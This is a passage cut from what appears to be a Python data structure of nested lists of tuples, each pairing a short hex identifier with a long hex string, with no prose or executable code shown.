362363cf7376f5891952914c33d2cb90d5ff7b86fe53b4057d0ab81f0618ca8d0870f8d535c3307f8cb623a10553a59e884c33d58c05fc71ae5e652'), ('9a7884fec49e61a404cbf516f33cf731', 'f6b63a44d169afad20276c25aeedc987f04677e4f85ed863c98352fb7303ca40e086570ca4b507b8bf8c99cf91b3366d3818ec90f01386ae99befd672df12f653c59468c721dfa706c235f2df0f127bb27b6da34935fb05bdec9820a23312c00cf6ba60ca22e8e58cded66b326bb46a100ff72e12d9d511815b731fd1c1305a86e2451c9cac15024784370488175495d5bb410fb6435ddbe329d1bebed4e737bd5d1b3a0bb755f003239c1cfc5d4e1ec9e748e5dc913f46f3b2176c66522f75f5e8a3474a98af20063211ac03bea256746ccdff9bc23f70f312531dbb08bbbd1cba1435511c13811db22f04c7dd500cc759711251ef129227958a5df6005583fb2d2dfea10956e3e0719792fec71e0b9932c755b0b76e88bc93ed0fecbab6b21b1508797865f1fd42b66aaf742cc6ee4c290aaab03673a33c91582fed84fcf2c4c3f472be86d681db9c46d664744c19698ff7b004ec432a85841a31d41ba54cba5ba3499a7b63ddc5cd8a94f5fa255b40f9af88faec4eaeeda46ff8f2f576e88ec0794bb22ea4d4a95f8cd3a1c29d00c2938a3e9755c30336666713159e503f7759b6252cfa0f14f45cc78423b6871f4cc2ee014cbc5cf395881c3d12414e07546aece36ee3f2efcf4ae4cee0de142efb217d2e5493f7879893e5da8db21188639238adc6730bc94c2dc1ef4e0eaa55a2d677dd394d7894f0f0c51aebb6d556d'), ('f102921b94077ab5225baf1ad95d5852', '5bf4e696c7431cc974e686e1d43ffba43e9a7e740333a448b0f4f7682cfd02d36b3e0e3d896763160eaf462abddda18ae35791218b5e1c3c5d8a3bf9019c060f8d948e4a4545c3b5be776fcf0811aada9776a6e59aa2ffbf79cf183e7434ae91422ed7f8fd3ba2e7e5048f202c37640bea82bea9177d6e0643288416d3e8c2fd417c7cbb3e01444c0c915dac87453ba0f860d18880cd26df67869cd5a1e16dd3bb1a293f36df9fa01a8949f606a77a1a55237c3a6efab5a014301da6f1a54c67ef700d9991aa11656d6628b765a93758ef7e1cf86e998a57e519ee645e44b22579bbfe53ad1186a43225122c86135ac1410ff97fa2653c46da9690abedb0272ce833dea397176e9b3e6c8536ebbbd1f909b354f09521ce7807dca8f737037858ef6d4f0c32ee485bd50794f8badf85382c91da8081e1bedc6262d2382409a579bc0a5c7b2bc7443087fa6e55b864a18dea51f9914fff54dd2b31e7a6fae4f0cf28106aace82f5b9bbe8b850a0354e52883dd069f864138aadf00abf4cf28f484801b1eb06fe10035c32033da7097c0677cb89a641a9758034b333b75c15f52edfddbb05c9a1f329a5b0d1d2215375882ec94fe64e5b1bc14c67a6fa39a649e8fd56bdc5210860a941509d81089c89cc0975a1922a88869c2c8b739c048fe1eb731321574c162738ed60c26e1272a4d01f1d92f591a27a2df4c742d73bc414da5'), ('003b069839997d4e66f0f43aa8edae51', '4e7031a86861ec39a36a0f0ad69c80015516072c7fcc6022600fe186d2edcf123ce6f417471d43ff53d6d844977150fc546a58cbab5358dcc4ce897efa78b21b20e024cc6048e450df5327a0288d50338207ab54d2f711aa2d236533a3f88d1c6ac9353504b0349f1b3864e6b10c809dfbbb38ce4a50ecc95860d061e33bdfdc8c757d5533ee39008ec70bab74839c309af3913a7c067d1a60738077dae9553c6c4313a4588cfe8901ca5251a719fa02021bc73fca84e3d0e50927747c40955cac194c6deb8a4ad71bfa8b4812458c5b6522f80972d6836ec9a00d565ecfb7f293aa167f3787677914ece430c3395b416874bd22226be9dc88281f5ccac1c1162f6eb4c992a3cef89ac806ec5bd2a810c40c698b1f0f9bcccaeba12ee75670f5ccfdea24d202e204505e3764410851498d584beb8c2d21527ed6082d835201e9189ab20b79ad4ba84b93ee631674842f14423ef4decf145c597eb0f033d0c3382711a820067cad33b615de030ef4bb900ec9e5abe87201ee0b7da96d046db10ff4dc936d2a678574d68884beb1ab955df63c98084047c4d2e2e5795ce0b72e861910855e03c74794e0023a4efbd9feaae8ad016611fe76294c256fcff9e706acfffbd10e2f5b5dc63cc60bdc1104e96ecaacfe1095f18a5dbc5d47f081b41777d457dceb2362da56ec148f58d047dc22692f5e73acf86fec946991d49ba45d39'), ('080ef6b94d41c96b18098f2ed205164f', 'b28da2e4eb8b9ac6a9cd47061088fd62ad2d94afd94d6a31e462e3ff7ad66ef1ea9e6200279bd30039bf991845f3e403cf234e6ac9959295af55a9dffaeab11f5a3b2d994cdf8de7f6845fb38ec9c0ebee0f8778ba0640348a1a7bde4dcfb817a6a34d87645de2d4e2aabb97f5769ea9ac0bbac864306f397cb5905a85882b2bba53e3d812ed5c6ba23fc3bd7c592796c4112a9e5562657236f36f4c830a8392e0c598bd9cfe8ad4e3066a77280aefe3b9d8166da74698d340382b0ba61ff900922e2d6b9d30c65a330d20ab85248c4c34590cc1a745c9bfc9f3702b4159ef94c5486890a4ad257b8da938c89a059d92d39a3c6aadd7ca7c231ede40c3417c59238f3d7fe42a466184e73c11a635a5a1af6a1deb889102ce42977a789db023dc17caeaf8c4922bbf6b704ce19f618600c994505d84f552e704f57ddb0ac7265bbf317ca2eace5ebccbf16df23b715e1d0c4f2d350ad8975ab77217ff740e1a8462ba77fd11019a193282e6625afc0f239a17773dba57adb2105cd8c32fddb1ea34d81b99d6b9c5858224f0e79aa0760a081bb70651e8de30ff0c129de19e9f069592806790daf4173c650621a7da21f957f64c3389ba84a096c703c0c91f2304ed711f27d508fbb7b9fb1073ea752c5bed2b0d58b7d0f56aff6eb2188c30fabc1c55537dd2562dd39e68d21b995c7d1a16852518af0a73b860e9c6b7143253cc'), ('a63af10e8eb7f7fa5628459037731b77', 'fc9e1c8059297f029393b3164ac164a1e84de2a64effa654047c8f1747939b96cfa486cd83b8784743fe6cde8f35f27905c24eb4633ab20e93c9b2ad6c470e60bec69633151a150c172d5e477a2b163a611844b92f76e21f24a36914ddc5fa45085272f4ef3603f7df3e75441601d562f8a44264bc6f59e667ae6596998013cd225ad7d3f949114292d884bc4d3505021221a1cf93f51a2b3e28abe9934d9a61f0ebe12a645f9c76c9d441838ff1b1cba0fc13380bfe8a79b15ec4fc040ce87cee5b60aa2bf4bec29028e8df17810daf479f3a9ac180ddf338533b3e6055a21304a7cc7966ae3d80ff0d622a729fe0a30de7acedcb23f911b023a12de7608866112259d1bd43eb2439e96ea4359f7fce2e80e796f92ee4f6903c7fbcacc1701a22b0c06071ea54a89d95f6ab52a2a2c1912b8afc073d08445df3b4a8f9816677eef73124fd59fc78b799141d8bd4bdf49eadfa70c93303b54a920f78101cab7ac0a2b59d807ba4780c576686fe0a47d6a0bf5c311cff418a9154afd0cb0f58c6d25a898b566670e706f7721f91aa3309881d9735633fec744e5e06943648540d75a93889fb7db492475753b162bf396515e4f8f2fc3993f6eb89b8a2210402ed01eb4a2fe346350b9378bffa9c76752362167815675c435c96b06805799f7b3399d105f29281713f332312d31ad7add10b261badfc798cc8b6176ec3dd21d457')], [('23d1e9f87a84a29a142edc2ed3380cf5', '4bb7858a49aa36d459acfa2e34039e9d83ffdfb7bf65ee887482216e30e5b98821d685cd0fede93802cf2fb76b050f62320b5a238e15ba8875462c1ed7aa62885b30edd6cc2f03c87b0f7f98365cd6efe289ba8d177f99ca5d14e43bcea1fbf9bd3c490116113e4588656078461a4c1898cd104ca6d8e3d293c36f197fff1f130332f68483985a6c650a9ecd58a1633bf5514504486402b72dac5f6a27cd5d629d0a956897eb36a0f04df0d30b10c457bf1b135108fa6663179d40a25140864ae44139af4e7b1f9f6e750898ced656a63815bc82ae80dd692a91c164e1434d2e1cda7bf03be22f339ed334e734afc02de53ba79ee65701c5948e90e878b7841fc3a18bc8c82db8fe71c96bc03cfea06d8be2fe0e65b29b4b2b74f78ccc4cbb25c5aefe45b0580ef3d89889d3c62d73da3c764d0309cb10d34c17a8cc3c90e7cb269f5f15d3fd068699f766ca05ab06d665ca35b9e3d0ac38bc5b35e809996185f845270eefdeb889ddda8bb667a21eb89b7d8bb585a5429fc11474991f11405eb878372529d4c886ba43f5fb0fb69f2a610c1fef6b872a1bc9e0df65f6798bcce350d9eb0d6cff6cc9bf7be39b7dd8afac54da21ab56e346d30da0c8e163ff296d102b5866dcede4e55014aeb784c0e585f0b5641d9904421a817de1bb9ea126e0eccfafe36757beb9c9a8aa040beee242c86e3538343c01838a9664883a789d15884ea477208daad2e7e08d1eb484ba'), ('a53d70bfcf98b677bcc0130a94409f64', 'c34186408eefa7056e5a6520a5af2bacdc5d21fda89fcf6d6c7ca1266383ee041c16897b73ac5c5e52a739b88e3eb1176957c9ce712abd6e10d62359234327d18b96b2d9b0c8db2952bdd9ada3b76d09d7ea66c07da269da45a126731e8ce02d8f73fc94ccb1739b6dab5c49e0da1e957244d7388e93ebb17e6eee63cdd9e204d58947e404c7339f0128a6d18dbd146163b0090ba1f1f3360549eec3f8ee173ffd60ae65d5ac651b538c7c3b36b9dd19feccf0932843fb1d2bb0ce6c87b68d7b24a8b7c946736d63d9e4daec804899abcfd41b17d5f3a71540bff24f4b55b49b317c06be907b5ffbbfd19ad9adac2b005f613a73404f6e0839d5ec611cc6e4a8ae4f3d489359c397e3001907294ef07529c7764c8d6215cdc5756bd8f77fbba895b0e6ba820f0c0fe8f0873c23531a730a4c67d9484f4c33aa4adfc665c0d30f291695cfe9ca5861e5ce2ecc15346094f038a4bb29726eb988a8276ee605a15f7f6bacc74ef22bf143a61ab047f4299e8d465015782458db5058824d26cbc8c10d063c9b5b299559274a599132a8b48f2ca7f0213dd41e2ffb92928a996433a6dfc52a11eb2feca1b8f39ba8ac86c4ccc25df6e9798412f53c940e52d4ee1043ddf5817f22ef0003b62c7b1b9b325ccbd144a0814679d9387981a93cc6cc3895bb9e937298bdc66d4ca60614706b605e466a1c44ef98f4702fef9b0173b7ea5cae7dce602805861ae30729a476d48ff5'), ('018f6272793ff1a7004d3b2b77d33653', '1fd32d42b9bcd319503ba431cb0d727cfdcd4f928e467fe64dc773fd8cf0fb339b25c2281694638d0836684d4541b2a6b2e25168b00ce9dfa9f40222a20bcb43deb9ab139c1cbb4ae8565fa25efb8e5a01fefb9dd9e9c1df22d046835cbd0483882c1ef136bd5fa50a10a05488a9f0eae317c1bce1e3b50836d3c144cbb29dc86cac47e4109a9cf893f5f9562e5eae1d3a893911d10de69591b27c8173ec855e0aefce34ed0f4dbf7393b48449bd0aec36e37859b279994e90700c69ade3fac7b9688e6fcc9b631c4ab38c8e33e9334e7d8348f179856efde54e97998d71586d14a240685433de20dcef9c7b4e3dff1ad1d63633d4f0cde76239f85d58288ef5ef3552e04b74160c41e3f95406d1d50bc334bc794004484ce6c6a0658a927eb94d5e13ed447b1271fe70d169edd557a2af9371afe9916b48314acfb7e77751900145a40c8cf7fb4b5b4af0200d42d9b08d53374f8b81c8f18e55977698d925ad39fce3e486068573627ba4a02bd32ac71772e506c2a65579f38837ca2eb1e49c12d0d14c09990a6c1c9181903b4fe6858dde239691a94101f8be5b31b8f89f93d71709c217da8909664970164323a364ab3991c1a355205024093ed5cfe8420fe8249ffc158f419e8fad97ab21d18addd9f4f4bb8c389040813e5ad641ddca363e3607f191e45acf46de1d93d413ec207636fcc3845cc30657649fc3ddf98492559f0ec0726c1bc4295edf7ba33c2694'), ('045248270453bc78839d2b89ea8bf3f1', '5c56bef5850b0e5a4b07bf36511032f447883c2b1f2000d85a301b6758c6996bb79124dbac9427ec51ca9c4c13bc50cd9324dc0c138526023e6599608818c8a906208c85c4f0884f2403c604ee16e7a02c1081ee416339a93c3ddcdc52cca7d7e10720658aa8af2b7793506f2cb974bc516c86cf216769fb2394b809ced757b6ff4c735b367abf450da22d373e48560e06b611ef4a705b28847b824db8367425318c7c6be7885a6238e82977000c8a610d59645eb6f10bb88ddbf44c740b6971199e886a40b932e6d47db23553bd4cc21c68706284be1d7a29e4041e2a01a3c4b125515d1d5d92bcacf8b9a04b2f203950a0653b3ae431cb87714e485aa9c3c4421b5d5e802b5ae75990b5f7aec87407cfc1bd5dbb48989165bd6785fca4849e1c2b1e0ef4b26a016e13b149a12c4ebab73c746fc26488fd4b17e3de0520ac1082b8f83af123af5362069355f0b06ae03473b58dbe9271acae93c06705b6724d8571766547a328000cb44141a6dcdbef8ced8a8b6a39566e52c94e546f5d7f09b10a5f48ae4cf553c927a51fe1260efe2d2f7d04cef557fb21af3aee4b97e9dd8737d9d7fef5d5dc364ade8c07562f3fce1f4b1b0f8e52304a786d3fd795719222e8d48f3ebc522fa4e54ab1c11808ecb5815de61df1c3d15e272c34179fe674692f8d6c835a7a3d0202b55f526e9a57e26bfe523d1e8833ab2e02ee8297c4963d331b1e4efeb447b2bc9a5cc73ce196'), ('41ee9f4f815555778107d116581b6ba2', '6cca133a935a0bb0098d9afa8175bce7dcfadb0414cb6da3e8e8e0e8b1a2b16a25764395824fdc74e958e444ab130e77f61a489d2c5947e50ab7ddadeafb40fbd6e846a6a3f6086263e2a89cfbb084bf083c53477b32ecc1e96e314e8cf0bac61f1357c1322d9ea0d2114eab10c6e0a0dde49ea2e773e3a45a95dd08b5701bde8ff4cd483e6e0c465340368b2be085f3cf8e4c4f9809fd4ba39e932021d5da272a97f0744369bc47dc41343dcd23efcd369ee896f0ec26a3972d9010cf69877e7749d4b4ab9395dc2656aca0ec69d16c45299b6c640fbd5b40b1f915e5650dba1e869ceef4f31f009f05de0bd587ee9ea4b2fa177d1275b5aa7e969512a7246fd82bb31135c50fa82cdcdb61b5e7d559055e6ecc12f1446f4847a3590569062f3cb6663231b0d4fbc9a958adec3cd9ba48ce785006d294cb421af81fa5d476940c9517fd4a41a413979f40afd6b29f68ecfad129fcd914b08f517dba4c8dc57e641fa8501be4d462b2f742a031dff83cf7a4f12f249fdb9ed2a587e73933e8c19c85a08bf63e6d6dfa256299100d18da5be96a1e8363626a8c02bbc5565a9f4b63e3fd60cdafa8469aba42d10e2f42b580f81e2bcb41f39632ad884da4c6556e96817dc604bf7f2b8e06cb900f9ddbf0cc70e10c5f10a67fa93bb0bdc7d2730fbee6cc9c359a611aa3d4c022af10d6750c9f68ef898d68db6ebf96f283b597caa6863dccbb181d55efe1ef8ecc8fa3c8'), ('79fb5848ec9a6101ba78d9fa50d98fd9', '745e5a0c083093d771260f069dc9e9de24477df2905d8dd3bc3157e9b86e04d9921b3a72cfa3b94129e1c9f3006f3127f482179541bff5b4509136e32b1f210e244bc672a118e0e883ecf9e3ded31d990f67fc7fe4def4befe1428b764860973bfe0e0eaa429351c67c1d1ae27890ddfb3ce5e38901181506b0dbfdc8f7edb3bc08ade99d644dc3ea196df923b3a493d50631c70ca39b55bd85c32fe0f82333220ac8e550ca004a6db8191583e3c4808dc41775ef885e70f59d4dc89e3d4d54ab55670d581c5094ae0a9697ceff355501453f664ac3b6cd9e1931d7f05cf14e746d467de834ee8ea47ce73bfa0fcdb0cb1eebfc9e7aaefec43888309c8c108e9013a0de894e8001fec5ea0528ddc426e187686dfb0af1f54abb061aeaaea344c6826ab9e780bcf93083d6a1147874546ab2701a44b7e4917726dca20539213d0c83e2847dbce701b49499feeca497304ebf61fd19fc1506582a0df8baef66a9a52b49f83bc95c61acd710454ae0e838b0e9a7b14bf8c74096c1863bd8fd9386e56a1a2184e375ae8ae274b0073320b323e1103b08db2f369ed3098b87e03f18e45442b2073cd3d8374d2a5f2d4469aabc67b9914394232fc415d7f8f3246f432c308e831d9139f5bc007b39da599f9ebf151e4ea8896e706acfff76a068f368d0595874cb200c74f0a5d51c127eae7f286c9cb28defc5bd76fb5912eb26e30b54f0b2845fa61f1efe6fd8d3b1c1d1c5c'), ('45f3a8580e70b399b4e871aeb3ec8361', 'c59d8a11cf58726217e393ec5d14a5a3282476f3df5485bd59e3fcc62b10917c8da5e517f3a333dbf572770bba78f47c000d4c3c66820576c979bc600489ed3c2e56d9e875e8087f0201cee8113da8a89048a51798a4b9f9fbfa3f7c716058df811513f935e50491e0019726e80a713bff84d97094a016dbd92e3a3f8140f05e5893538eaa3dec438a495b64246b4203074d390485ce785079d07c9b521c79df3b7c1f4821e6d2086d05fbd2db179eabdf81978eb4b7df5cc2fb0c87635088d920005b0bc75c616af90b5ff92f78417d5606c4f69efa564db3b06657217ee612fd8b95e2ad4c768d365bc1d9e92eea3c821bbc4e2bfc5a231e7d7cd560bda1d9b96298e406b00e11883ebf0313c5d231dcd4649433dddff27846c181fe7bbd52cca5a11b518d14c8dfd0f99508a6faee50212d7b4b94e43a69c309d213fe972f5bddd6ddd8fc844f2869e448ca2a280906e5a4ff0ca3e4cb78cf949178ab9859ea217ad192fb4a34455f5f1f0fef4b5855900f6d53992bf92d4faee6b530f3e80d7a074a17b117b263478013fccb9e62cfe8da0549950ffa60a1896e0a8834576b71a807324af9ca0412a6cd0ec644a533d7579d2d5b2c16047faec9f71d06baac00132c393a744de169151c190db665782e520b95a7077ca7325dc6241ba4d2bb92f1cfcee433d285e1c32f8f0978dfa267bef6ad3a89475f5eb19422a0ad69468b80d3e83aab5ab66f253c197f1ac1'), ('719ba6e0a86d988c78d70f5ec8b93988', '73abc161f1860ec28c27e955d17a298f1e82627e5d9d6d29e69bd8e23d5820529042fa0f7c8174b75421f2cc95309322b7c570db3f023c69c4b21abe55c710825ec68bea83a1108c20787efd0b95d96923edd12666f6302e0e55dd67319a144b70d6307e21dcfaecf459c8bb809b789082954cd8722e7c318ddf788382103063c4faec8f3fa4516d15013ec76e0e692f767fe0db8ba8b767b74e57cf857bfa2b0918214e56060a98bc4d56f9f17cdcd605d1b36141bbc6a83bbbef9d3b13acb52efaa2267af8822d98d9cfa89f04392afc560aabcbc5d6084a4383665633390fd2651ad6aa717191980f739776675d3be113711d401c5a6a98e94a4ee2842af30f929f684d76cfd57c1d6d7a44cdc667bba7218f88d07357474ff9eca0f17deef292f3f4c589634fea48c2ac66e92dc6862d0ff435acfa527ce20083cd894d81cd2ed3dbea9051dc9a219256de2561ceffe355711a70890bde16e3658f53cbd1659debddbe49017c5cf0f767ac9880191591fa061c7801b4a5e1c29edaa567e8fd1d790cefe3d35056f10633ea4d4b998ac4416b8438f45c373f5926244f8f817e539c0973821c7d55a211c1d765c4bc3e3e3f7c6c72ea32ac11db15102188f9ca41cd13791fa58a487c133c62ec420eddf068bdcbb531af13fee9abce533b9311ddc99a334c361f5afafae0781a2591b62ce71613c3bc64994e237e48286f8aab6e4a85076fc4fc7d7eb408b61b7e2d'), ('519910a03686b4a0adf7972b0a94aaac', 'bc75dc6e1a0e0803e5a5b6d1f2581f4523cb043ccfdfb139c6c0dfca5e39638b1eda1034f53ef098703a0d7138cb59cac30869280af74b61be84d8cb246b68a5220949dcfa8f24fa2500833d392e80121e8499268eb792b74ef1d3868d8bfe53b99a1115d8dd7990ca769ce2d9e1024aafbd80c7d5ff09872043ceda62aa9f549a754d5bf2c34cf45f6ba360a3eeb7bb98bb9803b178db2cd469dcf57a6482e5543aeb5adef0610229a20a745b02562894fc46e92fb22e08d7f90a7212eb641c220648322aa0e81d3bcb5202e518e708111c75b8ec3e7f4b6a566aff06b4b8c33d733b1e03a10afc2e6d7fff428ac11372be9c68f405f0af0405f847179aa2d63f41e874c4990bee34f550045da29ae862ba542b80c552e3cccfa7d812d22f3d9343bdc51de4af6a47cc488a7c154ddec573b1cae67db95b2d14f276a32892938de1784827443d9c9d6945da9d2570a5becf97399313280e475eec96296089e8799e6fcc79e56d02ba07e7af885ddba9506646a905e5d64cf7937bbf1126f9941bb417466ff2638185368a0143c51f7793875bfe4874f4b0e2eaa16f32e66d32f049120126571136f7a1038b65360ca4e7754e9410d313d7c2ed859d69041eba756dc0f3e5d7f9399676ab2b8de793722ebcb767a982b77beba9a4f8f777de7756f7c15b7430ac6cd815e9087936c206ce471ea84a3089bab352d76b3242b172b5ad06c2c83c03c79b957663c42be841'), ('e5f8e3f00e4e990c176eb73d018992f3', '89edecd44d05e505de4686a24cad7df190a81a130791c28890541adcb44cf59654e1dfdf2a908aea5596a689d5f25ae1200b7f8580ae689bfab36fabe23f55ded37471eef6fdea1dfb995f17e5a9aa96c75a85955e30a13c94666308cd8f64ab7dcca7b04d55ee31624b6ca7c16a41ade7a4d0f36cb4d3565047103920d98d0e4f3e111794691a680843b6312fba878438d6b50b443ae5cb64f0803eb7694df6245993618f6bbd16c9e9174aef98fa4f6ccb4b6fc3eb4b06ddaa6ce5a01882a8f3dc0f3cbf49715008f22643315632d0cb940c6be663eb562b34e93be528fedf86edcbfb792d4bc764c1bef568e7d1dcba541d0d2437026a7c9ed723d858e6a6e084b6353b11eda8d9509a9a104dca95e6154e9c0aa1f0186fcadc1f84101305a0b7cf6ffdfe1516279da1fa885a8b58e0ce09ac75a1303d3a30a40d3c26c88cc6edd599acdcbaec82583e06ab459d219eb45d9739c774de56c0e75655336aa9c4de3b83eee553f7a631109ae2ff86664a3215053c4c4086bb136e14e50d4bfbb9c7a088b0453b8d0ddbb10717204c9d739666a62e181a40e265a98d255b90e7c70beb692b61f65b0f00b5d179dcf6ebca3ef237a39f296d5ddde66ab8196dda660dedd1fef2f90341824a5b47e66102fa37ebdbbed1e1fbf5f88fc4a665ee9d566d2c0e8c60d262c94f049754ee896377df9a179e037b6f9341bab2fb21c209ad07ab44ea07a8ec78775b32079b2db4')], [('fdd0f89781359274d09fa75b3af5df23', 'de39a2bfd0633d03a8ea708283141e29f7dd643ea05adf129fac22b25012d450482fee48c578f4d83498752a565cb571004677421d39e3c044b29549e3ae087ec33dca39a230d5929d449ddfb76263451af60c03b35a333a32380ea45447a8dff431a3311cf3cb7add46a1369851ca1f766da80074e7ac33984d67ebea1b8ef70fa0110038e1f826d633cfbc56631b1731ad95df04e71ac99db2c58203c280d7f8c1f59347e2d61631c41e31c7a9f2d3499a7b0332f5d0833373fd95d18685dc749100724541ed3a74547dfb9400401832eea39bb302496feed89bb63a9cbc34c8499df6fe7911183a59e6036b8b7153a7410b90896dc3c9701a4ab234f6873521016c8e6ef725b18bca8b1447ae5130bc92fac66df75c4a39ebbf0b796b6f6e5c0d0a719212260cc2ce80de8636e54f2b9521bc5f238eae213473073f382017438e2bd12c74eeae0ac79cd88d88277b45529cfa8aaf2cef03c95c5119588b064f0ca8c39b48603ce560edcbdca67c81811e9d56a1f12a721e42766b0bcb30fac331b721cb4fbe91b3ed41261e79ea8bd7b0528196dc93104493f3468439e95c1f244799c9c44eceb91a094ea912eb484efc641ac9ddfbb074d998e32ea5dbf37286a46670a9b09f986df30efaaa33bde2ae8ccdfc199d3f1313854678d1cb2f0859ddaf3b785890b34fa067db8a0d4bf188abb57bc67dbc60026527805e1b29'), ('17b3c96e8cc9be77c1ccdf88ad7d7153', '3cedfab70998b962267e3ca12f6bb24038231780a8182fc35616154c7de7534925ce33c9cb4e3122b41e6663746e6329a3cbf350f26ed033530dad507b4e38e479c24c5a224252bff7acb88f20074a7ed878bf057b67ea1a5c43f2a5f334c9b15531c0564fb06b66bc793183699d21b4ed0dd11380a82b86bfef67a2f43aa80878aaf57c2d0e671f58ba1bac992093d0b1fad469997f059d22df6eff1c46210cb99d5a6f174e133249ec943cf11ae8b03c86831c9c06da25c9409f0dce6c373c7f4ae3abd8b1eb9777fbb0449577b5d720f5b3e3762515d212e47e1b495dd0d77b1dfa7d5b47032e10a56bb3cb4bef750aa07aa9ab67ae34f236b638ecea59be03a1745443f9879ecd08655dd5577b7f93112167cf5e359ecb21f406b553e101d02ba72c100a8e28b4fe4a0caedb1abe989ec6945d7002cfa6ec18b4eb8d6f82a649ed73d4b189622ad7429e1fd47b953432b291ec145234b799064f92a9632434b8596155b14bdfc2bf6e1e11db166645ee2ab7a408012185a94e11cfba11e86c3099843aa6f8db16a8cd13b0a5c3a6468a6e9a993f20bcc874555f57ab60d7ee3260507122f044b5d1548866d7f3a3aa2c39a98e8ff229e3be24848b82dc93bb3d36351d43a0bddad8ad16b2e4b101148bedf90edbd18f4fde2d16b4ee7b6e4bb4122e1916ed7714cd84d3985a05a06cee60b1fa88fc77296ed2fa6bb79bc7'), ('7a1690939f3504d8852e019bce703b36', '812593ba370e505a49454f3f6c577145740a4e480baa5c664438eefcb2c7b43cbe5ee70f4508d9f0573eb51e0d092d510ef39afb9b865a01b3ed3e52b0e1178dc5b5134e78ab7dbf67867df44d97d670f909caafae8c83e8137cc15d3b31f75140a6c1f0aaf731f7eced270889ac8baefac1a4915958688bff9e72642c20d3d07101e657c3f13e5b22fcd0abb1a1fbce3ef80148b602c27d77224b6b90b4888b91fe4709078908c66caa0ea7b5ab1c4cf44e440d72d029fd4195f7d7473b2439dafbb584aa2d311f61e7d7856bbb9ecdfe43f67dc8a7a584544e7d504be5f72f2c004b3bad7297a095a0dc946afa4734404ed854a81e94e459db2451f879a56ff88070ede0b2a50e80eb3bc4f0a57e7a0d7a26eb75a60841c5dd27a88df069e2d4168ab4fbc611d4d41b76f02aa4a7dcd6e4e961cff8f395e6c102b8b3f310ed1ca9a2240fb8c18ee144cf4811ab6d401f581098104a8904113231112f1548b5eaed352a5715708343156ee5de5da4cb6bb0a1c588b3134a15de09bcd66f6ab992de332350495a032595c56cc9ffa88ab2bb06f69a07925f993c2eff3fbcfdc439842740cc1c766bbcf0bc9e723874477649d53b31ead273a53bd3db4854a45b464f73d6644b25f0f7bc59160505427aebac54c3de1277a23a7674ab442cf15423ee92801869240d78a1868c0cd91b26963397ee415f35e750efc3fc7c575c76'), ('eea1250fb02d2caf92b6a8d876b14075', '94d5da092886333e61ba6c314e02f14224b9a95fd94f6f389665cd9d206f619ddc188548d359815a9cc633c280b8bb7abe7a6ad3c7b88bdfd23043c3b76c75219f6092e8d7a324b57cba39104142a90f828beebb37698de5339cd13a947051d59afcf5fdfecdbe42928f66e63e67fc032415045142c24c89971f771af5ce85e873ffa23854663d6935091af754f0daa3c73ccbf4e456fe0f0fe61215499f46bacf6d1ad82fe87bf13bfa32dc2ac7c35bb7f5d965b00a026c0807212ba9157545915bb54457e3e336edd68e974841fa84d34aaaeed4287f1679ee470d87ebeac8657d85be49ad264e521a6aa97b4e73bd305cba86765333339766be4fe0871cd651fdefeea435c3237f5e936c683f34275364fea0f5ba2549fd2c847cb472c1bd454fe76fb70dccb7d3873190c340a5f749269edb38b9f25b293d1bfc07fcb2bfc395e4e8d10aea5696b55655a88dd0e77b6f2c65434dcb2425ac18af4fef250f321f9f3b46d6cc8f00fda100363f40e663280f1684282796919780033da5028b4274cb213c3c111fc9ff005affee5cedcad5ead0cd1f3896134e3a8db6322a920b1257fe1f7edef4ff631cc01f6a3113846588edb2d5785d2b6038dcf6d50f3f91d8600225eb787da4f95969fb7e91992cfc9a6c306d620da1a96dc79d71b1cd2c1b1e55536ea1465db78dfb82bff19c8d860968a0a8691ca6e39cf1e0e1cf59'), ('82c51f77149b042a6f38b44b0271f8dc', 'ed615261517660499d6daedf05a37cc82e2570a73d901f3c0296270e6bad08a4383ba060758df6507994ea99847d4ab57f5ddef04f67f8b586d65645c0839d8ef1832f014fdb8650278a831ceb1aa4c6d0458459665dc1fffe73efeef01c48a78a6f2d3161a4c84a4d0136cfad011092f066e11629ead12ccc0ee5920740b9b1e470f48cc384d139581bf6ba2f0f19eebc6de74c92f7cbe5118ae9529d27de10969fc60799da805e61918e482ff9866abd2feeafb21f60f099ab37a0902a3394f4e4808342ea9191f8c4422b2d0773434286cf0fbafe29a8f2c72a0bd63824cc23dd69d89374b9ea9ba2bd72ef96720c4e53a46077090e97b945135f321b3ea38bf67e9963f10f089679752ef46b15e65e3d29a5f51d021abd386b30b1a551ee658b142efae4641ee39d1d936ffacbdca8fdaff70b570ff43adedab7fd621261d543a0f83832ae0d07ecb9c3fc9141717401b55518bd690f898d8205c13de38669a300a47781becaf20293e78582457de4ffbc5d99027e65c69cdd2f7c3a8b1a4627cdbe08af810f5e502567dead38b0f369c227a8ff718335e1161aa415bc08435ca3e052082a0fa089c4f80d27a52edea78948dc40a906e15bebd4c5e34f93266517f8e2f0b939f977554e94e21ed0551bb92ec76770d5e4fad0ed49d862556277d36a54693e115c472f173228d420eabd9e18c70c7c10ca65ac8fc4c15002'), ('750bc348b97e2babbff2a2ab090a2690', 'ec1df20251dfc84dc53f7b1b2460fb9691744453f8297e6dcfc9372c5c079a42d00d1468a51ac420a94126f5920356d6c8dedebb05d12084a58879a70df316ab4a93311c978d7985fd84df74f759eca9b4d14b53d633a33269309011438608b8132edd8db941adebf2664998d47ef197a754deb673253f80561bc3af9ec7dbe1b8ddaf9f5abd29d8dc4c8b9d181a029606dbf0cf06f6c9c3da4fab18330d0b9ba51206ca6215e26d9fd95ae1e85323f5adc6e1e01f191ea90dec0c0b2b7d35c86729f8214640fe0e7dec80862122b37d81d22fda1e71c1a78fabcf0e323635d8dadd0f658608e88e0fa3996711f7548d9687d60da6662a750a16bdc7545026e52019da17181b35b06e67b585a007103b0bcd553c86e7125e8a9bd71b6e9acf056ac33efb381179942199f40d65d63b4e194da3631a5d69d74f86dadcefe40dd4cb9720b1c54fd1b55b84e939cc204c6b935092b6bd8cd098273e3846e1762619e4207073146d8b4c84e57ddf5d1a711f5dda5441916bc3f7a58e6092dc748823700a8047aeac84eaf80c764610b058733be543988d5e222da44722148f0f6de1e024bd72cd5027c71aa88d7425fa8a88d0dbd28b4238fcda18b745b5f1b771c44b57e6987ed912d165eb25577d24367b1db3a396e9bbd4c64513b3bec66f96423ca24ee703bb156ff3e4791f6491d3f5eceda94542e8432290a2ea12a88906a2'), ('ba87f35146ae244d3687d0b6424b5d2a', 